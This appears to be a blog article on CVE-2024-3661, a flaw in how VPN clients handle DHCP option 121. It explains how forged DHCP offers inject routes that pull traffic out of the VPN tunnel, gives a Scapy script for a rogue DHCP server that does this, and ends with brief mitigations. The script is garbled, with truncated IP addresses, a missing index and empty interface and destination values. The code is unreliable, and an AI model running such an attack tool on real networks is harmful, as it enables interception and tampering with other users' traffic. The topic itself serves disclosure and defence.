The recently discovered vulnerability CVE-2024-3661 has raised deep-rooted concerns among VPN users and network security researchers. Discovered by a group of security analysts, the vulnerability can lead to VPN-based security solutions, relying on routes to redirect traffic, being forced to leak their data exchanges over a physical interface. An attacker present on the local network may read, disrupt or even possibly modify the network traffic that was supposed to be protected by the VPN.

In this article, we will dive deep into the exploit details, present code snippets and provide links to original references to help the readers understand the severity of the issue and ways to mitigate the risk.

Exploit Details

The vulnerability CVE-2024-3661 mainly affects the Dynamic Host Configuration Protocol (DHCP) and its ability to add routes to a client's routing table using the classless static route option, which is commonly known as option 121. This is where the network security loophole lies.

The attacker can exploit this vulnerability by forging DHCP responses, which include the classless static route option. These responses lead the client to believe that it is receiving these routes from a legitimate DHCP server and will consequently add these routes to its routing table, effectively exposing the VPN-based security solutions to traffic leakage.

Code Snippet

The following code snippets illustrate how an attacker can inject false static routes to a victim's routing table:

from scapy.all import *
import sys, os

# Configure a fake DHCP server
conf.checkIPaddr = False
dhcp_server = "192.168..100"
router = "192.168..1"

# Craft a forged DHCP packet
def forge_dhcp_packet(pkt):
        src_mac = pkt[Ether].src
        dhcp_request = pkt[DHCP].options[][1]
        if(dhcp_request == 1):
            spoofed_response = Ether(src=get_if_hwaddr("eth"), dst=src_mac)
            spoofed_response /= IP(src=dhcp_server, dst="")
            spoofed_response /= UDP(sport=67, dport=68)
            # Forge DHCP Response Packet with Classless Static Route - Option 121
            spoofed_response /= BOOTP(yiaddr="192.168..200", siaddr=dhcp_server, xid=pkt[BOOTP].xid)
            spoofed_response /= DHCP(options=[("message-type", "offer"),("subnet_mask", "255.255.255."), \
                               ("router", router),("name_server", dhcp_server),("domain", ""), \
                               (int(121), chr(int(24)) + "192.168.." + router),("end")])
            return spoofed_response

# Send the forged DHCP packet
def send_dhcp_response(pkt):
    response = forge_dhcp_packet(pkt)
    if(response != None):
        sendp(response, iface="eth")

# Capture the incoming DHCP packets
sniff(filter="udp and port 68",prn=send_dhcp_response)

1. Ensure the implementation of proper VLAN isolation on your network, which will prevent unauthorized users from gaining access to sensitive information.
2. Configure endpoint software like DNSCrypt on clients to add an extra layer of security for DNS queries.
3. Opt for VPN solutions that use a virtual network adapter or TUN interface, which doesn't rely solely on routing tables.


The CVE-2024-3661 vulnerability poses a grave threat to network security and the privacy of VPN users. By forging DHCP responses with classless static route options, attackers can expose the network traffic of VPN users within a local network. Therefore, it is crucial to understand the exploit details, assess the risks, and follow the appropriate mitigation steps to ensure the security of your network.


Published on: 05/06/2024 19:15:11 UTC
Last modified on: 05/08/2024 22:15:49 UTC